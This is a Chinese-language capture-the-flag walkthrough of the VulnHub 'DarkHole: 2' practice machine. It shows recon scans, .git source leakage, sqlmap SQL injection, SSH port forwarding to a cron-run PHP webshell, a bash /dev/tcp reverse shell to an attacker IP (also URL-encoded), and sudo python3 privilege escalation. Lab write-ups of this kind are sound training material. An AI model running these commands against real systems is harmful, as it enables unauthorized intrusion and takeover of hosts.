DarkHole: 2

靶机描述

靶机地址：https://download.vulnhub.com/darkhole/darkhole_2.zip

Description

Difficulty:Hard
This works better with VMware rather than VirtualBox
Hint: Don't waste your time For Brute-Force

信息收集

主机发现

利用arp-scan -l命令扫描靶机IP

arp-scan -l

开放端口服务信息获取

nmap -v -T4 -p- -A -oN nmap.log 192.168.75.170

发现.git泄露

目录扫描

dirsearch -u http://192.168.75.170/

gobuster dir -u http://192.168.75.170/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.txt,.html,.zip

.git源码泄露漏洞

下载.git

wget -r http://192.168.75.170/.git //-r递归下载所有文件

创建一个git存储库"webapp"，我们可以在其中执行所有git操作

git clone . webapp

查看login.php，我们看到了登录逻辑，并对输入参数进行了转义，防止注入

git log查看更新

看到第2次更新时，login.php使用了默认凭证
因此，我们将HEAD切换到该提交，并查看login.php

找到了用户名和密码，然后登陆平台

SQL注入

URL上，我们看到一个GET参数id，当我们改变它的值时，我们也可以观察到页面的变化
id=null时，数据为空

sqlmap跑一下

在ssh表里发现了一个账号密码，我们可以拿来连接ssh

SSH登录

权限提升一般通过查看sudo权限，发现具有特殊权限的文件，发现秘密文件，还有一些历史记录，定时任务，系统软件版本漏洞等
这道题这里采用的是定时任务，输入命令查看定时任务

cat /etc/crontab

可以看到运行了一个php服务器在9999端口上，用户为losy，我们可以尝试去看一下源代码

发现居然是一个一句话木马，我们可以通过携带我们想要执行的命令的cmd参数访问这个链接就可以以losy的身份执行命令
不过这个链接只能本地访问，因为我们已经获取了目标靶机的一个用户，所以我们可以使用SSH的本地转发功能（SSH -L）
这个功能是在本地监听一个端口，但该端口的连接被转发到远程主机的特定端口。相当于把远程端口映射到本地，即“将远程端口放在本地”
如下例子将监听本地9999端口，任何访问9999的客户端，都相当于远程访问example.com的80端口，但是流量是通过remote.server，并且所有流量都被加密

ssh -L 0.0.0.0:9999:example.com:80 user@remote.server

还有一种变体，目标主机与代理主机可以是同一台主机，即将remote.server服务映射到本地

ssh -L 0.0.0.0:9999:127.0.0.1:6379 user@remote.server

我们使用这个命令将目标靶机的本地9999映射到本地9999端口

ssh -L 9999:127.0.0.1:9999 jehad@192.168.75.170

然后我们在浏览器中访问9999端口，传入cmd参数

可以看到，用户为losy，我们可以反弹一个losy的shell

bash -c 'bash -i >& /dev/tcp/192.168.75.150/9000 0>&1'

进行URL编码后

bash%20-c%20'bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.75.150%2F9000%200%3E%261'

利用nc -nvlp 9000在本地开启监听，然后将上面命令作为cmd参数访问，从而拿到shell，然后对shell进行升级

python3 -c 'import pty;pty.spawn("/bin/bash")'

提权

sudo -l 查询发现可以使用python3提权

sudo /usr/bin/python3 -c  "import os;os.system('/bin/bash')"